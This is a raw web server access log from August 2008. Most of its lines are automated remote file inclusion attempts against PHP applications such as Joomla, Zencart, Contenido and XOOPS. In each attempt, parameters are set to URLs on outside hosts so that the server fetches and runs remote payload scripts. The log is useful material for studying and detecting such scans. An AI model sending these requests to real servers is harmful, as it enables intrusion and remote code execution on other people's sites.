151.11.24.250 - - [07/Aug/2008:08:45:12 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.purpleplanet.com/dds.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
151.11.24.250 - - [07/Aug/2008:08:45:13 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.purpleplanet.com/dds.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
67.18.151.242 - - [07/Aug/2008:08:45:18 -0500] "GET /logs/access_log.1212883200/joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
209.172.33.60 - - [07/Aug/2008:08:45:51 -0500] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
216.139.67.90 - - [07/Aug/2008:08:45:52 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.64"
216.139.67.90 - - [07/Aug/2008:08:45:52 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.64"
216.139.67.90 - - [07/Aug/2008:08:45:52 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.64"
209.172.33.60 - - [07/Aug/2008:08:45:53 -0500] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
64.119.182.156 - - [07/Aug/2008:08:47:00 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
64.119.182.156 - - [07/Aug/2008:08:47:00 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
203.98.87.14 - - [07/Aug/2008:08:47:20 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:08:47:21 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:08:47:21 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.226.77.5 - - [07/Aug/2008:08:49:56 -0500] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:08:49:56 -0500] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
203.98.87.14 - - [07/Aug/2008:08:50:28 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.226.77.5 - - [07/Aug/2008:08:50:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:08:50:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
203.98.87.14 - - [07/Aug/2008:08:52:32 -0500] "GET /logs/access_log.1213315200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:08:52:38 -0500] "GET /logs/access_log.1213142400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
204.15.10.22 - - [07/Aug/2008:08:53:07 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
204.15.10.22 - - [07/Aug/2008:08:53:08 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94311 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
62.169.0.50 - - [07/Aug/2008:08:53:40 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.169.0.50 - - [07/Aug/2008:08:53:41 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94311 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
193.178.228.12 - - [07/Aug/2008:08:54:36 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.178.228.12 - - [07/Aug/2008:08:54:38 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94311 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
77.90.20.2 - - [07/Aug/2008:08:55:12 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.93.189.130 - - [07/Aug/2008:08:55:30 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.93.189.130 - - [07/Aug/2008:08:55:30 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:08:55:40 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.238.65.54 - - [07/Aug/2008:08:55:55 -0500] "GET //becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 316 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:08:55:55 -0500] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
77.90.20.2 - - [07/Aug/2008:08:56:07 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.238.65.54 - - [07/Aug/2008:08:58:52 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 321 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:08:58:52 -0500] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:08:58:52 -0500] "GET //becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 316 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:08:58:52 -0500] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
212.92.23.89 - - [07/Aug/2008:08:58:54 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
216.139.67.90 - - [07/Aug/2008:09:00:00 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.64"
216.139.67.90 - - [07/Aug/2008:09:00:34 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.64"
216.139.67.90 - - [07/Aug/2008:09:00:34 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.64"
193.253.223.90 - - [07/Aug/2008:09:01:20 -0500] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:20 -0500] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:20 -0500] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:20 -0500] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:23 -0500] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:24 -0500] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:25 -0500] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:01:25 -0500] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:03:25 -0500] "GET /logs/access_log.1203724800/modules/My_eGallery/index.php?basepath=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:03:25 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:03:26 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
89.238.65.54 - - [07/Aug/2008:09:04:05 -0500] "GET /logs/access_log.1201737600//becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 343 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:04:06 -0500] "GET /logs/access_log.1201737600/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 321 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:04:06 -0500] "GET //becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 316 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:04:06 -0500] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:04:07 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 321 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:04:07 -0500] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
194.79.75.195 - - [07/Aug/2008:09:04:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:04:09 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:04:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:04:24 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:04:24 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:04:24 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
87.226.77.5 - - [07/Aug/2008:09:05:13 -0500] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
87.226.77.5 - - [07/Aug/2008:09:05:13 -0500] "GET //includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
89.208.43.121 - - [07/Aug/2008:09:06:12 -0500] "GET /logs/access_log.1216598400//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:06:12 -0500] "GET //admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:06:12 -0500] "GET /logs//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:13 -0500] "GET /logs//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:14 -0500] "GET //admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:16 -0500] "GET /logs/access_log.1216598400//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:23 -0500] "GET /logs/access_log.1216598400//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:24 -0500] "GET //admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:09:07:26 -0500] "GET /logs//admin.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.7.158.225 - - [07/Aug/2008:09:08:04 -0500] "GET /logs/access_log.1177027200 HTTP/1.1" 200 127660 "-""Mozilla/4.61 [en] (X11; U; SunOS 5.6 sun4u)"
216.206.238.35 - - [07/Aug/2008:09:08:05 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:09:08:05 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
63.247.141.9 - - [07/Aug/2008:09:08:23 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
63.247.141.9 - - [07/Aug/2008:09:08:23 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
63.247.141.9 - - [07/Aug/2008:09:08:23 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:08:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:08:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:09:09:15 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:09:09:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
63.247.141.9 - - [07/Aug/2008:09:09:27 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
63.247.141.9 - - [07/Aug/2008:09:09:27 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
63.247.141.9 - - [07/Aug/2008:09:09:27 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:09:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:09:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.6.18.231 - - [07/Aug/2008:09:10:47 -0500] "GET /logs/access_log.1158624000 HTTP/1.0" 200 234429 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.9.233.10 - - [07/Aug/2008:09:11:04 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:09:11:05 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:09:11:05 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
89.238.65.54 - - [07/Aug/2008:09:12:05 -0500] "GET /logs/access_log.1213315200//becommunity/community/index.php?pageurl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 343 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:12:05 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 321 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
77.90.20.2 - - [07/Aug/2008:09:13:04 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:09:13:33 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:09:13:33 -0500] "GET //modules/xfsection/modify.php?dir_module=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
72.55.148.240 - - [07/Aug/2008:09:15:34 -0500] "GET //index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/id.txt%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
72.55.148.240 - - [07/Aug/2008:09:15:34 -0500] "GET /logs//index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/id.txt%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
216.206.238.35 - - [07/Aug/2008:09:15:51 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.253.134.145 - - [07/Aug/2008:09:16:05 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:16:05 -0500] "GET //becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:16:43 -0500] "GET /logs/access_log.1201737600//becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:16:43 -0500] "GET //becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:09:16:44 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
72.9.233.10 - - [07/Aug/2008:09:16:50 -0500] "GET /logs/access_log.1213142400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
78.137.163.133 - - [07/Aug/2008:09:17:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [07/Aug/2008:09:17:13 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.199.244.42 - - [07/Aug/2008:09:17:27 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 350 "-""Advanced Browser (http://www.avantbrowser.com)"
66.199.244.42 - - [07/Aug/2008:09:17:27 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 355 "-""Advanced Browser (http://www.avantbrowser.com)"
72.9.233.10 - - [07/Aug/2008:09:17:38 -0500] "GET /logs/access_log.1213315200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:19:22 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:19:22 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:19:22 -0500] "GET /logs/access_log.1212883200//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
65.38.169.228 - - [07/Aug/2008:09:19:52 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
65.38.169.228 - - [07/Aug/2008:09:19:52 -0500] "GET //becommunity/community/index.php?pageurl=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
219.117.239.114 - - [07/Aug/2008:09:20:07 -0500] "GET /logs/index.php?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:09:20:07 -0500] "GET /index.php?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
194.79.75.195 - - [07/Aug/2008:09:20:14 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:20:15 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:20:15 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:20:31 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
58.102.118.201 - - [07/Aug/2008:09:21:17 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:17 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:17 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET ///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
